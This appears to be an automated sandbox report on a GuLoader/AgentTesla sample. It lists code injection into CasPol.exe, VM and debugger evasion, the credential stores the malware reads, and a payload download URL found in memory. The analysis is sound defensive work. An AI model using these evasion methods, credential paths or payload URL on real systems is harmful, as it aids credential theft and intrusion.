Source: C:\Users\user\Desktop\pago12_14299038859.exe Code function: 1_2_02AF3E8C push edx; retf 1_2_02AF3E98
Source: C:\Users\user\Desktop\pago12_14299038859.exe Code function: 1_2_02AF4486 push esp; retf 1_2_02AF44E4
Source: C:\Users\user\Desktop\pago12_14299038859.exe Code function: 1_2_02AF4486 push FFFFFFCFh; retf 1_2_02AF452C
Source: C:\Users\user\Desktop\pago12_14299038859.exe Code function: 1_2_02AF3AE8 push eax; retf 1_2_02AF3AFC
Source: C:\Users\user\Desktop\pago12_14299038859.exe Code function: 1_2_02AF44E8 push FFFFFFCFh; retf 1_2_02AF452C
Source: C:\Users\user\Desktop\pago12_14299038859.exe Code function: 1_2_02AF18FB push eax; retf 1_2_02AF18FC
Source: C:\Users\user\Desktop\pago12_14299038859.exe Code function: 1_2_02AF122F push ebp; retf 1_2_02AF1230
Source: C:\Users\user\Desktop\pago12_14299038859.exe Code function: 1_2_02AF1409 push es; ret 1_2_02AF1428
Source: C:\Users\user\Desktop\pago12_14299038859.exe Code function: 1_2_02AF0C19 push B6F4B489h; ret 1_2_02AF0C1E
Source: C:\Users\user\Desktop\pago12_14299038859.exe Code function: 1_2_02AF3C4F push esp; retf 1_2_02AF3C50
Source: C:\Users\user\Desktop\pago12_14299038859.exe Code function: 1_2_02AF2BA7 push ebp; retf 1_2_02AF2BA8
Source: C:\Users\user\Desktop\pago12_14299038859.exe Code function: 1_2_02AF4BBE push eax; retf 1_2_02AF4BC0
Source: C:\Users\user\Desktop\pago12_14299038859.exe Code function: 1_2_02AF4987 push esp; retf 1_2_02AF49B0
Source: C:\Users\user\Desktop\pago12_14299038859.exe Code function: 1_2_02AF3F9D push edx; retf 1_2_02AF3FC4
Source: C:\Users\user\Desktop\pago12_14299038859.exe Code function: 1_2_02AF319C push eax; ret 1_2_02AF31A2
Source: C:\Users\user\Desktop\pago12_14299038859.exe Code function: 1_2_02AF3B98 push edx; retf 1_2_02AF3BA0
Source: C:\Users\user\Desktop\pago12_14299038859.exe Code function: 1_2_02AF4793 push eax; retf 1_2_02AF47A0
Source: C:\Users\user\Desktop\pago12_14299038859.exe Code function: 1_2_02AF21E2 push ecx; retf 1_2_02AF21E8
Source: C:\Users\user\Desktop\pago12_14299038859.exe Code function: 1_2_02AF0FE0 push esp; retf 1_2_02AF0FEC
Source: C:\Users\user\Desktop\pago12_14299038859.exe Code function: 1_2_02AF29CA push edx; retf 1_2_02AF29E0
Source: initial sample Static PE information: section name: .text entropy: 7.15645216813

Hooking and other Techniques for Hiding and Protection:

barindex
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\pago12_14299038859.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\pago12_14299038859.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\pago12_14299038859.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect Any.run
Source: C:\Users\user\Desktop\pago12_14299038859.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\pago12_14299038859.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: pago12_14299038859.exe, 00000001.00000002.12764606750.0000000004C60000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLL
Source: pago12_14299038859.exe, 00000001.00000002.12761620467.0000000000764000.00000004.00000020.sdmp, pago12_14299038859.exe, 00000001.00000002.12764606750.0000000004C60000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17066728382.0000000001510000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: CasPol.exe, 0000000B.00000002.17066728382.0000000001510000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1RVZMBX5UH5TLF4YLXHMC756C1SKQ0VOB
Source: pago12_14299038859.exe, 00000001.00000002.12761620467.0000000000764000.00000004.00000020.sdmp Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4252 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window / User API: threadDelayed 9956 Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\pago12_14299038859.exe System information queried: ModuleInformation Jump to behavior
Source: pago12_14299038859.exe, 00000001.00000002.12764803304.0000000004FA9000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17070436045.0000000003219000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: pago12_14299038859.exe, 00000001.00000002.12764803304.0000000004FA9000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17070436045.0000000003219000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: CasPol.exe, 0000000B.00000002.17070436045.0000000003219000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
Source: pago12_14299038859.exe, 00000001.00000002.12764803304.0000000004FA9000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17070436045.0000000003219000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: CasPol.exe, 0000000B.00000002.17068255801.00000000016D6000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAWN
Source: pago12_14299038859.exe, 00000001.00000002.12764606750.0000000004C60000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dll
Source: pago12_14299038859.exe, 00000001.00000002.12764803304.0000000004FA9000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17070436045.0000000003219000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: pago12_14299038859.exe, 00000001.00000002.12764803304.0000000004FA9000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17070436045.0000000003219000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: CasPol.exe, 0000000B.00000002.17070436045.0000000003219000.00000004.00000001.sdmp Binary or memory string: vmicvss
Source: CasPol.exe, 0000000B.00000002.17068255801.00000000016D6000.00000004.00000020.sdmp, CasPol.exe, 0000000B.00000002.17067847597.0000000001697000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: pago12_14299038859.exe, 00000001.00000002.12761620467.0000000000764000.00000004.00000020.sdmp, pago12_14299038859.exe, 00000001.00000002.12764606750.0000000004C60000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17066728382.0000000001510000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: pago12_14299038859.exe, 00000001.00000002.12764803304.0000000004FA9000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17070436045.0000000003219000.00000004.00000001.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: CasPol.exe, 0000000B.00000002.17066728382.0000000001510000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=https://drive.google.com/uc?export=download&id=1rvzmbX5uh5tlf4YLxhmc756C1SkQ0vOB
Source: pago12_14299038859.exe, 00000001.00000002.12764803304.0000000004FA9000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17070436045.0000000003219000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: pago12_14299038859.exe, 00000001.00000002.12761620467.0000000000764000.00000004.00000020.sdmp Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
Source: pago12_14299038859.exe, 00000001.00000002.12764803304.0000000004FA9000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17070436045.0000000003219000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: CasPol.exe, 0000000B.00000002.17070436045.0000000003219000.00000004.00000001.sdmp Binary or memory string: vmicheartbeat

Anti Debugging:

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\pago12_14299038859.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread information set: HideFromDebugger Jump to behavior
Enables debug privileges
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process token adjusted: Debug Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\pago12_14299038859.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_01249938 LdrInitializeThunk, 11_2_01249938
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Writes to foreign memory regions
Source: C:\Users\user\Desktop\pago12_14299038859.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 1300000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\pago12_14299038859.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\pago12_14299038859.exe" Jump to behavior
Source: CasPol.exe, 0000000B.00000002.17069921407.0000000001DC0000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: CasPol.exe, 0000000B.00000002.17069921407.0000000001DC0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: CasPol.exe, 0000000B.00000002.17069921407.0000000001DC0000.00000002.00020000.sdmp Binary or memory string: Progman
Source: CasPol.exe, 0000000B.00000002.17069921407.0000000001DC0000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected AgentTesla
Source: Yara match File source: 0000000B.00000002.17078384160.000000001E361000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 5004, type: MEMORYSTR
GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 0000000B.00000002.17078384160.000000001E361000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 5004, type: MEMORYSTR

Remote Access Functionality:

barindex
Yara detected AgentTesla
Source: Yara match File source: 0000000B.00000002.17078384160.000000001E361000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 5004, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs